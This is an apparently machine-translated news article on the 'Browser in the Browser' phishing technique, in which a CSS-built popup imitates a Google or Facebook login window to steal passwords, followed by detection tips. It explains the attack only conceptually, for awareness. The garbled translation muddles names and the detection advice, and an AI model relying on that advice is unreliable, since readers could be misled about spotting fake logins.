This method is so clever that even the smartest and smartest Internet users can be fooled by it. (Photo: various websites)
Silicon Valley: Infinite Logins’ YouTube channel for cyber security has its own channels Latest video I found out that hackers have discovered a new “phishing” method called “Browser in Browser” (BitB) to steal usernames and passwords of Internet users.
This video is for cyber security experts detailing the “BitB” method with reference to a white-hat hacker named “Mr. Dox” (mr.d0x).
Published in Infinite Logins and Mr. Docks and Ars Technica News Accordingly, this new method is so clever that even a smart and intelligent Internet user can be deceived by it.
BitB is based on “third party logins” used by millions of websites around the world today.
In third party login, you do not need to create a separate account to login to any website but you can login to this website by verifying your existing account on Google, Facebook or Apple.
for this purpose “OAuth” An open protocol that provides automatic, fast and secure Google, Facebook, Apple, etc. account verification is used to login to any website.
Using the “Bit B” method in Hypertext Markup Language (HTML) using a technique called Cascading Style Sheets (CSS), a popup is created for third party logins which looks just like an authentication (authorization) window.
But not only this, but the URL in the address bar of this window also looks very real like accounts.google.com etc.
Even an informed Internet user is deceived by this and enters their username and password into the login window of a third party; Thus, he inadvertently provides his most important information to an unknown hacker.
Ars Technica Related post Security Editor Dan Gooden offers some tips for identifying and avoiding “bit B” phishing.
He writes that the “Bit B” phishing login window is not a separate but a “browser within a browser” window that looks like a separate, original login window.
Is this login window real or fake? If it’s moving left or right, it’s a fake login window because it was apparently formatted with the help of CSS.
Dan Gooden’s second method for identifying phishing B is a bit tricky.
In it, you need to right-click on the login window and select Check, after which you need to take a closer look at the text in the scan window that appears, where you can save the entered username and password. The unknown website address will be entered.
This way you will discover for yourself the truth of this fake login window.
Additionally, if desired, enter the wrong username and password in this login window for testing purposes. If true, false username and password will be sent, but the fake login window will accept them as ‘correct’.
Cyber security experts say that so far most phishing attacks have been easy to spot, but the “bit b” method is so complex that users need to be aware of alternative authentication methods to avoid it. And most consumers don’t do this out of convenience.
According to Mr. Dokes, the new phishing method appeared a few weeks ago, but it is likely that hackers have been using it since 2020.